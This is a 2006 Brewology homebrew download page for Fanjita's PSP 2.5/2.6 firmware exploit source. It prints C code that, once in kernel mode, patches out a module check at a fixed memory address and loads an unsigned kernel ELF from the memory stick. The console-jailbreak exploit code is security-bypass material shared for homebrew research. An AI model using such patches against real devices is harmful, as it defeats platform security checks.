.
•
Register
•
Login
Brewology.com
All Downloads
PS3
Blu-Ray Disc Java (BDJ)
Custom Firmwares
Drivers
Emulators
Firmware
Homebrew Applications
Homebrew Games
Jailbreaks
Linux Tools
Themes
Tools and Utilities
PSP
Development
Development Libraries
Development Utilities
Source Code
Emulators
Amiga
Amstrad CPC
Apple II
Arcade
Atari
BBC Micro
Carice
Chip 8
ColecoVision
Commodore 64
CPS2
DOS
Dragon32/64 emulator
Gameboy / GBC
Gameboy Advance
HP48
M.A.M.E
Macintosh
MSX
Neo Geo
Nintendo 64
Nintendo NES
PC-9801
PlayStation One
QUASI88
SamCoupe
ScummVM
Sega Genesis Megadrive
Sega Master System
Sinclair ZX81
Super Nintendo SNES
Thomson MO5
TI
Turbo Grafx 16
Vectrex
WonderSwan
X86
Yabasic
ZX Spectrum
Firmwares
Game-Addon-Packs
Hacks and Exploits
Homebrew Applications
General Apps
Media Apps
Organization Apps
Wi-Fi / IR Apps
Homebrew Games
Flash Games
General Games
LUA Games
Homebrew Packs
Magazines
Backgrounds
PSP Magazines
PC Tools
EBOOT Tools Utilities
General Tools Utilities
PSP Emulator
Wii
Applications
Homebrew
Applications
Games
Brewology:
Brewology Menu
Forums!
News
PS3 Homebrew/PSN Store
PSVita Homebrew Store
PS3 Homebrew Manager
PSN Links
PSN Update Finder
PSN / PKG Downloader
Downloads
PSP
PS3
Wii
Saved Games
PSP
PS3
Wii
Go Back
2.60 Firmware Exploit - Fanjita Source
Filename
SAVEDATA.rar
Date Posted
Jun 27, 2006
Categories
Source Code
,
PSP
Tags
PSP
Downloads
1112
Description:
Fanjita has released the "source" of his work so far today on this newly discovered exploit. If you would like to take a look at it and continue investigating, have a look!
Only for v2.5 / v2.6.
Based on Proof of Concept code by Hitchhikr / Neural.
Function : Attempts to load ms0:/kernel.elf using sceLoadModule/sceStartModule when in kernel mode, after writing a NOP to 0x8801A5B4.
Diags: Writes a log of operations to ms0:/GTALOG.TXT.
If LoadModule fails, writes the error code to ms0:/failload.trc.
If StartModule fails, writes the error code to ms0:/failstart.trc.
Source for the interesting bit:
void kernel_proc(void) {
// Dump'em all - read access
int handle;
int luid;
unsigned int *probe;
dlog("check dlog");
#if 1
dlog("patch module check");
// Patch module check
probe = (unsigned int*) 0x8801A5B4;
probe[0] = 0;
#endif
dlog("load module");
// try loading an ELF
luid = sceKernelLoadModule("ms0:/kernel.elf", 0, NULL);
if (luid < 0)
{
handle = sceIoOpen("ms0:/failload.trc", O_WRONLY | O_CREAT | O_TRUNC, 0777);
sceIoWrite(handle, &luid, 4);
sceIoClose(handle);
}
else
{
dlog("start module");
luid = sceKernelStartModule(handle, 0, NULL, NULL, NULL);
if (luid < 0)
{
handle = sceIoOpen("ms0:/failstart.trc", O_WRONLY | O_CREAT | O_TRUNC, 0777);
sceIoWrite(handle, &luid, 4);
sceIoClose(handle);
}
}
for(;;) { }
}
Download File